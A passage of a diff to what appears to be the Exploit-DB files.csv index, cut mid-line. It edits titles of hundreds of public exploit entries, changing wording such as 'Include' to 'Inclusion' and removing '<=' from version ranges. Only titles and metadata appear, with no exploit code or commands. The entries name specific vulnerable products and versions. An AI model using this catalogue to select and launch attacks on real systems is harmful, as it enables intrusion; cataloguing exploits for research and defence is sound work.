Weckbecker",php,webapps,0 37691,platforms/php/webapps/37691.txt,"SugarCRM Community Edition Multiple Information Disclosure Vulnerabilities",2012-08-31,"Brendan Coles",php,webapps,0 37692,platforms/multiple/dos/37692.pl,"aMSN Remote Denial of Service",2006-01-01,"Braulio Miguel Suarez Urquijo",multiple,dos,0 -37693,platforms/php/webapps/37693.txt,"Sitemax Maestro SQL Injection and Local File Include Vulnerabilities",2012-09-03,AkaStep,php,webapps,0 -37694,platforms/php/webapps/37694.txt,"Wiki Web Help 'configpath' Parameter Remote File Include",2012-08-04,L0n3ly-H34rT,php,webapps,0 +37693,platforms/php/webapps/37693.txt,"Sitemax Maestro SQL Injection and Local File Inclusion Vulnerabilities",2012-09-03,AkaStep,php,webapps,0 +37694,platforms/php/webapps/37694.txt,"Wiki Web Help 'configpath' Parameter Remote File Inclusion",2012-08-04,L0n3ly-H34rT,php,webapps,0 37695,platforms/php/webapps/37695.txt,"Sciretech Multiple Products - Multiple SQL Injection Vulnerabilities",2012-09-04,AkaStep,php,webapps,0 37696,platforms/asp/webapps/37696.txt,"Cm3 CMS 'search.asp' Multiple Cross-Site Scripting Vulnerabilities",2012-09-05,Crim3R,asp,webapps,0 37697,platforms/php/webapps/37697.txt,"phpFox 3.0.1 - 'ajax.php' Multiple Cross Site Scripting Vulnerabilities",2012-09-04,Crim3R,php,webapps,0 @@ -34041,7 +34041,7 @@ id,file,description,date,author,platform,type,port 37707,platforms/php/webapps/37707.txt,"WordPress Count Per Day Plugin 3.4 - SQL Injection",2015-07-27,"High-Tech Bridge SA",php,webapps,80 37708,platforms/php/webapps/37708.txt,"Xceedium Xsuite - Multiple Vulnerabilities",2015-07-27,modzero,php,webapps,0 37709,platforms/php/webapps/37709.txt,"phpFileManager 0.9.8 - Remote Command Execution",2015-07-28,hyp3rlinx,php,webapps,0 -37710,platforms/linux/local/37710.txt,"Sudo <= 1.8.14 - Unauthorized Privilege",2015-07-28,"daniel svartman",linux,local,0 +37710,platforms/linux/local/37710.txt,"Sudo 1.8.14 - Unauthorized Privilege",2015-07-28,"daniel svartman",linux,local,0 37711,platforms/windows/dos/37711.py,"Classic FTP 2.36 - CWD Reconnection DoS",2015-07-28,St0rn,windows,dos,0 37712,platforms/php/webapps/37712.txt,"phpFileManager 0.9.8 - CSRF",2015-07-29,hyp3rlinx,php,webapps,80 37713,platforms/php/webapps/37713.txt,"2Moons - Multiple Vulnerabilities",2015-07-29,bRpsd,php,webapps,80 @@ -34094,8 +34094,8 @@ id,file,description,date,author,platform,type,port 37762,platforms/lin_x86/shellcode/37762.py,"Linux/x86 - /bin/sh ROL/ROR Encoded Shellcode",2015-08-12,"Anastasios Monachos",lin_x86,shellcode,0 37763,platforms/windows/dos/37763.txt,"NetServe FTP Client 1.0 - Local DOS (Overflow)",2015-08-12,Un_N0n,windows,dos,0 37764,platforms/windows/dos/37764.html,"Internet Explorer CTreeNode::GetCascadedLang Use-After-Free (MS15-079)",2015-08-12,"Blue Frost Security GmbH",windows,dos,0 -37765,platforms/multiple/webapps/37765.txt,"Zend Framework <= 2.4.2 - XML eXternal Entity Injection (XXE) on PHP FPM",2015-08-13,"Dawid Golunski",multiple,webapps,0 -37766,platforms/multiple/dos/37766.py,"Google Chrome <= 43.0 - Certificate MIME Handling Integer Overflow",2015-08-13,"Paulos Yibelo",multiple,dos,0 +37765,platforms/multiple/webapps/37765.txt,"Zend Framework 2.4.2 - XML eXternal Entity Injection (XXE) on PHP FPM",2015-08-13,"Dawid Golunski",multiple,webapps,0 +37766,platforms/multiple/dos/37766.py,"Google Chrome 43.0 - Certificate MIME Handling Integer Overflow",2015-08-13,"Paulos Yibelo",multiple,dos,0 37767,platforms/multiple/webapps/37767.txt,"Joomla Event Manager 2.1.4 - Multiple Vulnerabilities",2015-08-13,"Martino Sani",multiple,webapps,0 37768,platforms/windows/local/37768.txt,"Windows 8.1 - DCOM DCE/RPC Local NTLM Reflection Privilege Escalation (MS15-076)",2015-08-13,monoxgas,windows,local,0 37769,platforms/php/webapps/37769.txt,"Gkplugins Picasaweb - Download File",2015-08-15,"TMT zno",php,webapps,0 @@ -34111,7 +34111,7 @@ id,file,description,date,author,platform,type,port 37779,platforms/php/webapps/37779.txt,"Flogr 'index.php' Multiple Cross Site Scripting Vulnerabilities",2012-09-05,"High-Tech Bridge",php,webapps,0 37780,platforms/windows/local/37780.c,"ThinPrint 'tpfc.dll' Insecure Library Loading Arbitrary Code Execution",2012-09-04,"Moshe Zioni",windows,local,0 37781,platforms/php/webapps/37781.txt,"ExtCalendar 2.0 Multiple SQL Injection and HTML Injection Vulnerabilities",2012-09-05,"Ashiyane Digital Security Team",php,webapps,0 -37782,platforms/php/webapps/37782.txt,"web@all Local File Include and Multiple Arbitrary File Upload Vulnerabilities",2012-09-06,KedAns-Dz,php,webapps,0 +37782,platforms/php/webapps/37782.txt,"web@all Local File Inclusion and Multiple Arbitrary File Upload Vulnerabilities",2012-09-06,KedAns-Dz,php,webapps,0 37783,platforms/linux/dos/37783.c,"GNU glibc 'strcoll()' Routine Integer Overflow",2012-09-07,"Jan iankko Lieskovsky",linux,dos,0 37784,platforms/php/webapps/37784.txt,"Pinterestclones Security Bypass and HTML Injection Vulnerabilities",2012-09-08,DaOne,php,webapps,0 37785,platforms/php/webapps/37785.txt,"VICIDIAL Call Center Suite Multiple SQL Injection",2012-09-10,"Sepahan TelCom IT Group",php,webapps,0 @@ -34131,7 +34131,7 @@ id,file,description,date,author,platform,type,port 37943,platforms/php/webapps/37943.txt,"WebTitan 'logs-x.php' Directory Traversal",2012-10-20,"Richard Conner",php,webapps,0 37944,platforms/php/webapps/37944.txt,"vBSEO 'u' parameter Cross Site Scripting",2012-06-16,MegaMan,php,webapps,0 37945,platforms/php/webapps/37945.txt,"SilverStripe 2.4.x - 'BackURL' Parameter URI Redirection",2012-10-15,"Aung Khant",php,webapps,0 -37946,platforms/php/webapps/37946.txt,"WordPress Crayon Syntax Highlighter Plugin 'wp_load' Parameter Remote File Include Vulnerabilities",2012-10-15,"Charlie Eriksen",php,webapps,0 +37946,platforms/php/webapps/37946.txt,"WordPress Crayon Syntax Highlighter Plugin 'wp_load' Parameter Remote File Inclusion Vulnerabilities",2012-10-15,"Charlie Eriksen",php,webapps,0 38001,platforms/windows/dos/38001.py,"freeSSHd 1.3.1 - Denial of Service",2015-08-28,3unnym00n,windows,dos,22 37798,platforms/windows/dos/37798.py,"XMPlay 3.8.1.12 - .pls Local Crash PoC",2015-08-17,St0rn,windows,dos,0 37799,platforms/windows/local/37799.py,"MASM321 11 Quick Editor (.qeditor) 4.0g- .qse SEH Based Buffer Overflow (ASLR & SAFESEH bypass)",2015-08-17,St0rn,windows,local,0 @@ -34162,7 +34162,7 @@ id,file,description,date,author,platform,type,port 37830,platforms/cgi/webapps/37830.txt,"ZEN Load Balancer Multiple Security Vulnerabilities",2012-09-24,"Brendan Coles",cgi,webapps,0 37937,platforms/linux/local/37937.c,"Linux Kernel 3.2.x - 'uname()' System Call Local Information Disclosure",2012-10-09,"Brad Spengler",linux,local,0 37938,platforms/php/webapps/37938.txt,"OpenX /www/admin/plugin-index.php parent Parameter XSS",2012-10-10,"High-Tech Bridge",php,webapps,0 -37939,platforms/php/webapps/37939.txt,"FileContral Local File Include and Local File Disclosure Vulnerabilities",2012-08-11,"Ashiyane Digital Security Team",php,webapps,0 +37939,platforms/php/webapps/37939.txt,"FileContral Local File Inclusion and Local File Disclosure Vulnerabilities",2012-08-11,"Ashiyane Digital Security Team",php,webapps,0 38066,platforms/php/webapps/38066.txt,"WordPress Video Lead Form Plugin 'errMsg' Parameter Cross Site Scripting",2012-11-29,"Aditya Balapure",php,webapps,0 38067,platforms/hardware/webapps/38067.py,"Thomson Wireless VoIP Cable Modem TWG850-4B ST9C.05.08 - Authentication Bypass",2015-09-02,Orwelllabs,hardware,webapps,80 37833,platforms/php/webapps/37833.txt,"YCommerce Multiple SQL Injection Vulnerabilities",2012-09-21,"Ricardo Almeida",php,webapps,0 @@ -34268,11 +34268,11 @@ id,file,description,date,author,platform,type,port 37933,platforms/php/webapps/37933.txt,"Netsweeper 4.0.8 - Authentication Bypass",2015-08-21,"Anastasios Monachos",php,webapps,0 37934,platforms/php/webapps/37934.txt,"WordPress Shopp Plugin Multiple Security Vulnerabilities",2012-10-05,T0x!c,php,webapps,0 37935,platforms/php/webapps/37935.txt,"Interspire Email Marketer - (Cross Site Scripting/HTML Injection/SQL Injection) Multiple Vulnerabilities",2012-10-08,"Ibrahim El-Sayed",php,webapps,0 -37936,platforms/php/webapps/37936.txt,"Open Realty 'select_users_lang' Parameter Local File Include",2012-10-06,L0n3ly-H34rT,php,webapps,0 +37936,platforms/php/webapps/37936.txt,"Open Realty 'select_users_lang' Parameter Local File Inclusion",2012-10-06,L0n3ly-H34rT,php,webapps,0 37952,platforms/windows/remote/37952.py,"Easy Address Book Web Server 1.6 - USERID Remote Buffer Overflow",2015-08-24,"Tracy Turben",windows,remote,0 37954,platforms/windows/dos/37954.py,"Mock SMTP Server 1.0 Remote Crash PoC",2015-08-24,"Shankar Damodaran",windows,dos,25 37955,platforms/php/webapps/37955.html,"Pligg CMS 2.0.2 - CSRF Add Admin Exploit",2015-08-24,"Arash Khazaei",php,webapps,80 -37956,platforms/php/webapps/37956.txt,"WordPress GeoPlaces3 Theme - Arbitrary File Upload Vulnerbility",2015-08-24,Mdn_Newbie,php,webapps,80 +37956,platforms/php/webapps/37956.txt,"WordPress GeoPlaces3 Theme - Arbitrary File Upload",2015-08-24,Mdn_Newbie,php,webapps,80 37957,platforms/windows/dos/37957.txt,"GOM Audio 2.0.8 - (.gas) Crash POC",2015-08-24,Un_N0n,windows,dos,0 37958,platforms/multiple/remote/37958.rb,"Firefox PDF.js Privileged Javascript Injection",2015-08-24,Metasploit,multiple,remote,0 37959,platforms/php/webapps/37959.txt,"BSW Gallery 'uploadpic.php' Arbitrary File Upload",2012-10-18,"cr4wl3r ",php,webapps,0 @@ -34285,7 +34285,7 @@ id,file,description,date,author,platform,type,port 37966,platforms/windows/dos/37966.txt,"Microsoft Office 2007 OneTableDocumentStream Invalid Object",2015-08-25,"Google Security Research",windows,dos,0 37967,platforms/windows/dos/37967.txt,"Microsoft Office 2007 Malformed Document Stack-Based Buffer Overflow",2015-08-25,"Google Security Research",windows,dos,0 37968,platforms/php/webapps/37968.txt,"CMS Mini 0.2.2 - 'index.php' Script Cross Site Scripting",2012-10-19,Netsparker,php,webapps,0 -37969,platforms/hardware/remote/37969.txt,"FirePass <= 7.0 SSL VPN 'refreshURL' Parameter URI Redirection",2012-10-21,"Aung Khant",hardware,remote,0 +37969,platforms/hardware/remote/37969.txt,"FirePass 7.0 SSL VPN 'refreshURL' Parameter URI Redirection",2012-10-21,"Aung Khant",hardware,remote,0 37970,platforms/php/webapps/37970.html,"WordPress Wordfence Security Plugin Cross Site Scripting",2012-10-18,MustLive,php,webapps,0 37971,platforms/php/webapps/37971.html,"WHMCS 4.5.2 - 'googlecheckout.php' SQL Injection",2012-10-22,"Starware Security Team",php,webapps,0 37973,platforms/php/webapps/37973.txt,"SMF 'view' Parameter Cross Site Scripting",2012-10-23,Am!r,php,webapps,0 @@ -34297,7 +34297,7 @@ id,file,description,date,author,platform,type,port 37979,platforms/php/webapps/37979.txt,"VicBlog Multiple SQL Injection Vulnerabilities",2012-10-26,Geek,php,webapps,0 37980,platforms/windows/dos/37980.pl,"Microsoft Office Excel Denial of Service",2012-10-11,"Jean Pascal Pereira",windows,dos,0 37981,platforms/windows/dos/37981.pl,"Microsoft Paint 5.1 - '.bmp' Denial of Service",2012-10-27,coolkaveh,windows,dos,0 -37982,platforms/hardware/remote/37982.pl,"TP-LINK TL-WR841N Router Local File Include",2012-10-29,"Matan Azugi",hardware,remote,0 +37982,platforms/hardware/remote/37982.pl,"TP-LINK TL-WR841N Router Local File Inclusion",2012-10-29,"Matan Azugi",hardware,remote,0 37983,platforms/php/webapps/37983.php,"EasyITSP 'customers_edit.php' Authentication Security Bypass",2012-10-26,"Michal Blaszczak",php,webapps,0 37984,platforms/windows/dos/37984.pl,"KMPlayer 3.0.0.1440 - '.avi' File Local Denial of Service",2012-10-26,Am!r,windows,dos,0 37985,platforms/windows/remote/37985.py,"FHFS - FTP/HTTP File Server 2.1.2 Remote Command Execution",2015-08-27,"Naser Farhadi",windows,remote,80 @@ -34322,7 +34322,7 @@ id,file,description,date,author,platform,type,port 38005,platforms/windows/remote/38005.asp,"MS SQL Server 2000/2005 SQLNS.SQLNamespace COM Object Refresh() Unhandled Pointer Exploit",2015-08-29,ylbhz,windows,remote,0 38006,platforms/php/webapps/38006.txt,"bloofoxCMS 0.3.5 Multiple Cross Site Scripting Vulnerabilities",2012-10-31,"Canberk BOLAT",php,webapps,0 38007,platforms/php/webapps/38007.txt,"DCForum auth_user_file.txt File Multiple Information Disclosure Vulnerabilities",2012-11-02,r45c4l,php,webapps,0 -38008,platforms/php/webapps/38008.txt,"Joomla! com_parcoauto Component 'idVeicolo' Parameter Remote SQL Injection",2012-11-03,"Andrea Bocchetti",php,webapps,0 +38008,platforms/php/webapps/38008.txt,"Joomla! com_parcoauto Component 'idVeicolo' Parameter SQL Injection",2012-11-03,"Andrea Bocchetti",php,webapps,0 38009,platforms/php/webapps/38009.txt,"AWAuctionScript CMS Multiple Remote Vulnerabilities",2012-11-04,X-Cisadane,php,webapps,0 38010,platforms/php/webapps/38010.txt,"VeriCentre Multiple SQL Injection Vulnerabilities",2012-11-06,"Cory Eubanks",php,webapps,0 38011,platforms/php/webapps/38011.txt,"OrangeHRM 'sortField' Parameter SQL Injection",2012-11-07,"High-Tech Bridge",php,webapps,0 @@ -34335,7 +34335,7 @@ id,file,description,date,author,platform,type,port 38018,platforms/php/webapps/38018.txt,"WordPress PHP Event Calendar Plugin 'cid' Parameter SQL Injection",2012-11-09,"Ashiyane Digital Security Team",php,webapps,0 38019,platforms/php/webapps/38019.txt,"WordPress Eco-annu Plugin 'eid' Parameter SQL Injection",2012-11-09,"Ashiyane Digital Security Team",php,webapps,0 38020,platforms/hardware/remote/38020.py,"Multiple Huawei Products Password Encryption Weakness",2012-11-13,"Roberto Paleari",hardware,remote,0 -38021,platforms/multiple/dos/38021.pl,"Media Player Classic <= 1.5 - (MPC) WebServer Request Handling Remote DoS",2012-11-16,X-Cisadane,multiple,dos,0 +38021,platforms/multiple/dos/38021.pl,"Media Player Classic 1.5 - (MPC) WebServer Request Handling Remote DoS",2012-11-16,X-Cisadane,multiple,dos,0 38022,platforms/php/webapps/38022.txt,"WordPress Dailyedition-mouss Theme 'id' Parameter SQL Injection",2012-11-16,"Ashiyane Digital Security Team",php,webapps,0 38023,platforms/php/webapps/38023.txt,"WordPress Tagged Albums Plugin 'id' Parameter SQL Injection",2012-11-16,"Ashiyane Digital Security Team",php,webapps,0 38024,platforms/php/webapps/38024.txt,"WebKit Cross Site Scripting Filter 'XSSAuditor.cpp' Security Bypass",2012-07-19,"Tushar Dalvi",php,webapps,0 @@ -34351,9 +34351,9 @@ id,file,description,date,author,platform,type,port 38035,platforms/windows/local/38035.pl,"Boxoft WAV to MP3 Converter - convert Feature Buffer Overflow",2015-08-31,"Robbie Corley",windows,local,0 38036,platforms/osx/local/38036.rb,"Apple OS X Entitlements - 'Rootpipe' Privilege Escalation",2015-08-31,Metasploit,osx,local,0 38037,platforms/php/webapps/38037.html,"Open-Realty 2.5.8 Cross Site Request Forgery",2012-11-16,"Aung Khant",php,webapps,0 -38038,platforms/multiple/dos/38038.txt,"Splunk <= 4.3.1 Denial of Service",2012-11-19,"Alexander Klink",multiple,dos,0 -38039,platforms/php/webapps/38039.txt,"openSIS 'modname' Parameter Local File Include",2012-11-20,"Julian Horoszkiewicz",php,webapps,0 -38040,platforms/php/webapps/38040.txt,"ATutor 'tool_file' Parameter Local File Include",2012-11-16,"Julian Horoszkiewicz",php,webapps,0 +38038,platforms/multiple/dos/38038.txt,"Splunk 4.3.1 Denial of Service",2012-11-19,"Alexander Klink",multiple,dos,0 +38039,platforms/php/webapps/38039.txt,"openSIS 'modname' Parameter Local File Inclusion",2012-11-20,"Julian Horoszkiewicz",php,webapps,0 +38040,platforms/php/webapps/38040.txt,"ATutor 'tool_file' Parameter Local File Inclusion",2012-11-16,"Julian Horoszkiewicz",php,webapps,0 38041,platforms/php/webapps/38041.txt,"WordPress Madebymilk Theme 'id' Parameter SQL Injection",2012-11-20,"Ashiyane Digital Security Team",php,webapps,0 38042,platforms/php/webapps/38042.txt,"dotProject 2.1.x index.php Multiple Parameter SQL Injection",2012-11-21,"High-Tech Bridge",php,webapps,0 38043,platforms/php/webapps/38043.txt,"dotProject 2.1.x index.php Multiple Parameter XSS",2012-11-21,"High-Tech Bridge",php,webapps,0 @@ -34385,7 +34385,7 @@ id,file,description,date,author,platform,type,port 38073,platforms/hardware/webapps/38073.html,"GPON Home Router FTP G-93RG1 - CSRF Command Execution",2015-09-02,"Phan Thanh Duy",hardware,webapps,80 38074,platforms/php/webapps/38074.txt,"Cerb 7.0.3 - CSRF",2015-09-02,"High-Tech Bridge SA",php,webapps,80 38075,platforms/system_z/shellcode/38075.txt,"Mainframe/System Z - Bind Shell Port 12345 Shellcode (2488 bytes)",2015-09-02,"Bigendian Smalls",system_z,shellcode,0 -38086,platforms/php/webapps/38086.html,"WordPress Contact Form Generator <= 2.0.1 - Multiple CSRF Vulnerabilities",2015-09-06,"i0akiN SEC-LABORATORY",php,webapps,80 +38086,platforms/php/webapps/38086.html,"WordPress Contact Form Generator 2.0.1 - Multiple CSRF Vulnerabilities",2015-09-06,"i0akiN SEC-LABORATORY",php,webapps,80 38076,platforms/php/webapps/38076.txt,"BigDump 0.29b and 0.32b - Multiple Vulnerabilities",2012-11-28,Ur0b0r0x,php,webapps,0 38077,platforms/php/webapps/38077.txt,"WordPress Toolbox Theme 'mls' Parameter SQL Injection",2012-11-29,"Ashiyane Digital Security Team",php,webapps,0 38078,platforms/php/webapps/38078.py,"Elastix 'page' Parameter Cross Site Scripting",2012-11-29,cheki,php,webapps,0 @@ -34395,11 +34395,11 @@ id,file,description,date,author,platform,type,port 38085,platforms/win_x86-64/dos/38085.pl,"ActiveState Perl.exe x64 Client 5.20.2 - Crash PoC",2015-09-06,"Robbie Corley",win_x86-64,dos,0 38087,platforms/windows/local/38087.pl,"AutoCAD DWG and DXF To PDF Converter 2.2 - Buffer Overflow",2015-09-06,"Robbie Corley",windows,local,0 38088,platforms/lin_x86/shellcode/38088.c,"Linux/x86 - execve(/bin/bash) shellcode (31 bytes)",2015-09-06,"Ajith Kp",lin_x86,shellcode,0 -38089,platforms/osx/local/38089.txt,"Disconnect.me Mac OS X Client <= 2.0 - Local Privilege Escalation",2015-09-06,"Kristian Erik Hermansen",osx,local,0 +38089,platforms/osx/local/38089.txt,"Disconnect.me Mac OS X Client 2.0 - Local Privilege Escalation",2015-09-06,"Kristian Erik Hermansen",osx,local,0 38090,platforms/php/webapps/38090.txt,"FireEye Appliance - Unauthorized File Disclosure",2015-09-06,"Kristian Erik Hermansen",php,webapps,443 38091,platforms/php/webapps/38091.php,"Elastix < 2.5 - PHP Code Injection Exploit",2015-09-06,i-Hmx,php,webapps,0 38100,platforms/hardware/remote/38100.txt,"Multiple Fortinet FortiWeb Appliances Multiple Cross Site Scripting Vulnerabilities",2012-12-01,"Benjamin Kunz Mejri",hardware,remote,0 -38101,platforms/php/webapps/38101.txt,"WordPress Zingiri Forums Plugin 'language' Parameter Local File Include",2012-12-30,Amirh03in,php,webapps,0 +38101,platforms/php/webapps/38101.txt,"WordPress Zingiri Forums Plugin 'language' Parameter Local File Inclusion",2012-12-30,Amirh03in,php,webapps,0 38102,platforms/php/webapps/38102.txt,"WordPress Nest Theme 'codigo' Parameter SQL Injection",2012-12-04,"Ashiyane Digital Security Team",php,webapps,0 38103,platforms/php/webapps/38103.txt,"Sourcefabric Newscoop 'f_email' Parameter SQL Injection",2012-12-04,AkaStep,php,webapps,0 38136,platforms/osx/local/38136.txt,"OS X Install.framework - suid root Runner Binary Privilege Escalation",2015-09-10,"Google Security Research",osx,local,0 @@ -34419,7 +34419,7 @@ id,file,description,date,author,platform,type,port 38114,platforms/cgi/webapps/38114.html,"Smartphone Pentest Framework Multiple Remote Command Execution Vulnerabilities",2012-12-10,"High-Tech Bridge",cgi,webapps,0 38115,platforms/php/webapps/38115.txt,"SimpleInvoices invoices Module Unspecified Customer Field XSS",2012-12-10,tommccredie,php,webapps,0 38116,platforms/lin_x86/shellcode/38116.c,"Linux/x86 - execve(_/bin/cat__ [_/bin/cat__ _/etc/passwd_]_ NULL) shellcode (75 bytes)",2015-09-09,"Ajith Kp",lin_x86,shellcode,0 -38118,platforms/xml/webapps/38118.txt,"Qlikview <= 11.20 SR11 - Blind XXE Injection",2015-09-09,"Alex Haynes",xml,webapps,0 +38118,platforms/xml/webapps/38118.txt,"Qlikview 11.20 SR11 - Blind XXE Injection",2015-09-09,"Alex Haynes",xml,webapps,0 38119,platforms/php/webapps/38119.html,"Auto-Exchanger 5.1.0 - CSRF",2015-09-09,"Aryan Bayaninejad",php,webapps,0 38120,platforms/php/dos/38120.txt,"PHP SplDoublyLinkedList unserialize() Use-After-Free",2015-09-09,"Taoguang Chen",php,dos,0 38121,platforms/php/dos/38121.txt,"PHP GMP unserialize() Use-After-Free",2015-09-09,"Taoguang Chen",php,dos,0 @@ -34433,10 +34433,10 @@ id,file,description,date,author,platform,type,port 38129,platforms/php/webapps/38129.txt,"Octogate UTM 3.0.12 - Admin Interface Directory Traversal",2015-09-10,"Oliver Karow",php,webapps,0 38130,platforms/java/webapps/38130.txt,"N-able N-central Cross-Site Request Forgery",2012-12-13,"Cartel Informatique Security Research Labs",java,webapps,0 38131,platforms/php/webapps/38131.txt,"PHP Address Book 'group' Parameter Cross Site Scripting",2012-12-13,"Kenneth F. Belva",php,webapps,0 -38132,platforms/linux/dos/38132.py,"Linux Kernel <= 3.3.5 - Btrfs CRC32C feature Infinite Loop Local Denial of Service",2012-12-13,"Pascal Junod",linux,dos,0 +38132,platforms/linux/dos/38132.py,"Linux Kernel 3.3.5 - Btrfs CRC32C feature Infinite Loop Local Denial of Service",2012-12-13,"Pascal Junod",linux,dos,0 38133,platforms/php/webapps/38133.txt,"RokBox Plugin for WordPress /wp-content/plugins/wp_rokbox/jwplayer/jwplayer.swf abouttext Parameter XSS",2012-12-17,MustLive,php,webapps,0 -38134,platforms/php/webapps/38134.txt,"Joomla! ZT Autolinks Component 'controller' Parameter Local File Include",2012-12-19,Xr0b0t,php,webapps,0 -38135,platforms/php/webapps/38135.txt,"Joomla! Bit Component 'controller' Parameter Local File Include",2012-12-19,Xr0b0t,php,webapps,0 +38134,platforms/php/webapps/38134.txt,"Joomla! ZT Autolinks Component 'controller' Parameter Local File Inclusion",2012-12-19,Xr0b0t,php,webapps,0 +38135,platforms/php/webapps/38135.txt,"Joomla! Bit Component 'controller' Parameter Local File Inclusion",2012-12-19,Xr0b0t,php,webapps,0 38138,platforms/osx/local/38138.txt,"OS X Install.framework suid Helper Privilege Escalation",2015-09-10,"Google Security Research",osx,local,0 38139,platforms/php/webapps/38139.txt,"MyBB Transactions Plugin 'transaction' Parameter SQL Injection",2012-12-18,limb0,php,webapps,0 38140,platforms/php/webapps/38140.php,"VoipNow Service Provider Edition Remote Arbitrary Command Execution",2012-12-21,i-Hmx,php,webapps,0 @@ -34505,7 +34505,7 @@ id,file,description,date,author,platform,type,port 38207,platforms/php/webapps/38207.txt,"Quick.Cms/Quick.Cart Cross Site Scripting",2013-01-09,"High-Tech Bridge",php,webapps,0 38208,platforms/multiple/dos/38208.py,"Colloquy Remote Denial of Service",2013-01-09,Aph3x,multiple,dos,0 38209,platforms/php/webapps/38209.txt,"WordPress Gallery Plugin 'filename_1' Parameter Remote Arbitrary File Access",2013-01-10,Beni_Vanda,php,webapps,0 -38210,platforms/php/webapps/38210.txt,"Kirby CMS <= 2.1.0 - CSRF Content Upload and PHP Script Execution",2015-09-22,"Dawid Golunski",php,webapps,0 +38210,platforms/php/webapps/38210.txt,"Kirby CMS 2.1.0 - CSRF Content Upload and PHP Script Execution",2015-09-22,"Dawid Golunski",php,webapps,0 38256,platforms/php/webapps/38256.py,"h5ai < 0.25.0 - Unrestricted File Upload",2015-09-22,rTheory,php,webapps,80 38258,platforms/ios/webapps/38258.txt,"Air Drive Plus 2.4 - Arbitrary File Upload",2015-09-22,Vulnerability-Lab,ios,webapps,8000 38213,platforms/php/webapps/38213.txt,"FAROL - SQL Injection",2015-09-16,"Thierry Fernandes Faria",php,webapps,80 @@ -34548,7 +34548,7 @@ id,file,description,date,author,platform,type,port 38251,platforms/php/webapps/38251.txt,"WordPress WP-Table Reloaded Plugin 'id' Parameter Cross Site Scripting",2013-01-24,hiphop,php,webapps,0 38252,platforms/windows/remote/38252.py,"Konica Minolta FTP Utility 1.0 - Remote Command Execution",2015-09-20,R-73eN,windows,remote,21 38254,platforms/windows/remote/38254.rb,"Konica Minolta FTP Utility 1.00 Post Auth CWD Command SEH Overflow",2015-09-21,Metasploit,windows,remote,21 -38255,platforms/php/webapps/38255.txt,"Kirby CMS <= 2.1.0 - Authentication Bypass",2015-09-22,"Dawid Golunski",php,webapps,80 +38255,platforms/php/webapps/38255.txt,"Kirby CMS 2.1.0 - Authentication Bypass",2015-09-22,"Dawid Golunski",php,webapps,80 38259,platforms/windows/dos/38259.py,"MASM32 11R - Crash POC",2015-09-22,VIKRAMADITYA,windows,dos,0 38260,platforms/windows/remote/38260.php,"Konica Minolta FTP Utility 1.0 - Directory Traversal",2015-09-22,shinnai,windows,remote,21 38261,platforms/xml/webapps/38261.txt,"SAP Netweaver < 7.01 - XML External Entity Injection",2015-09-22,"Lukasz Miedzinski",xml,webapps,0 @@ -34582,8 +34582,8 @@ id,file,description,date,author,platform,type,port 38289,platforms/windows/local/38289.txt,"Cisco AnyConnect Secure Mobility Client 3.1.08009 - Privilege Escalation",2015-09-22,"Google Security Research",windows,local,0 38290,platforms/php/webapps/38290.txt,"WordPress flashnews Theme Multiple Input Validation Vulnerabilities",2013-02-02,MustLive,php,webapps,0 38291,platforms/php/webapps/38291.txt,"EasyITSP 'voicemail.php' Directory Traversal",2013-02-04,"Michal Blaszczak",php,webapps,0 -38292,platforms/php/webapps/38292.txt,"refbase <= 0.9.6 - Multiple Vulnerabilities",2015-09-23,"Mohab Ali",php,webapps,0 -38294,platforms/php/webapps/38294.txt,"ezStats2 - 'style.php' Local File Include",2013-02-06,L0n3ly-H34rT,php,webapps,0 +38292,platforms/php/webapps/38292.txt,"refbase 0.9.6 - Multiple Vulnerabilities",2015-09-23,"Mohab Ali",php,webapps,0 +38294,platforms/php/webapps/38294.txt,"ezStats2 - 'style.php' Local File Inclusion",2013-02-06,L0n3ly-H34rT,php,webapps,0 38295,platforms/php/webapps/38295.txt,"ezStats for Battlefield 3 - /ezStats2/compare.php Multiple Parameter XSS",2013-02-06,L0n3ly-H34rT,php,webapps,0 38296,platforms/php/webapps/38296.txt,"WordPress CommentLuv Plugin '_ajax_nonce' Parameter Cross Site Scripting",2013-02-06,"High-Tech Bridge",php,webapps,0 38297,platforms/php/webapps/38297.txt,"WordPress Wysija Newsletters Plugin Multiple SQL Injection Vulnerabilities",2013-02-06,"High-Tech Bridge",php,webapps,0 @@ -34598,7 +34598,7 @@ id,file,description,date,author,platform,type,port 38307,platforms/win_x86/dos/38307.txt,"Windows Kernel - NtGdiBitBlt Buffer Overflow (MS15-097)",2015-09-24,"Nils Sommer",win_x86,dos,0 38308,platforms/hardware/remote/38308.txt,"TP-LINK TL-WR2543ND Admin Panel Multiple Cross Site Request Forgery Vulnerabilities",2013-02-08,"Juan Manuel Garcia",hardware,remote,0 38309,platforms/php/webapps/38309.txt,"osCommerce Cross Site Request Forgery",2013-02-12,"Jakub Galczyk",php,webapps,0 -38310,platforms/android/remote/38310.c,"Android <= 2.3.5 PowerVR SGX Driver Information Disclosure",2011-11-03,"Geremy Condra",android,remote,0 +38310,platforms/android/remote/38310.c,"Android 2.3.5 PowerVR SGX Driver Information Disclosure",2011-11-03,"Geremy Condra",android,remote,0 38311,platforms/php/webapps/38311.txt,"BlackNova Traders 'news.php' SQL Injection",2013-02-12,ITTIHACK,php,webapps,0 38312,platforms/php/webapps/38312.txt,"AbanteCart 'index.php' Multiple Cross Site Scripting Vulnerabilities",2013-02-14,LiquidWorm,php,webapps,0 38313,platforms/multiple/remote/38313.html,"Dell SonicWALL Scrutinizer Multiple HTML Injection Vulnerabilities",2013-02-14,"Benjamin Kunz Mejri",multiple,remote,0 @@ -34633,7 +34633,7 @@ id,file,description,date,author,platform,type,port 38342,platforms/ios/webapps/38342.txt,"My.WiFi USB Drive 1.0 iOS - File Include",2015-09-28,Vulnerability-Lab,ios,webapps,8080 38343,platforms/ios/webapps/38343.txt,"Photos in Wifi 1.0.1 iOS - Arbitrary File Upload",2015-09-28,Vulnerability-Lab,ios,webapps,0 38344,platforms/windows/dos/38344.txt,"Adobe Acrobat Reader AFParseDate Javascript API Restrictions Bypass",2015-09-28,"Reigning Shells",windows,dos,0 -38345,platforms/php/webapps/38345.txt,"Vtiger CRM <= 6.3.0 Authenticated Remote Code Execution",2015-09-28,"Benjamin Daniel Mussler",php,webapps,80 +38345,platforms/php/webapps/38345.txt,"Vtiger CRM 6.3.0 Authenticated Remote Code Execution",2015-09-28,"Benjamin Daniel Mussler",php,webapps,80 38346,platforms/bsd/remote/38346.rb,"Watchguard XCS Remote Command Execution",2015-09-28,Metasploit,bsd,remote,443 38347,platforms/bsd/local/38347.rb,"Watchguard XCS FixCorruptMail Local Privilege Escalation",2015-09-28,Metasploit,bsd,local,443 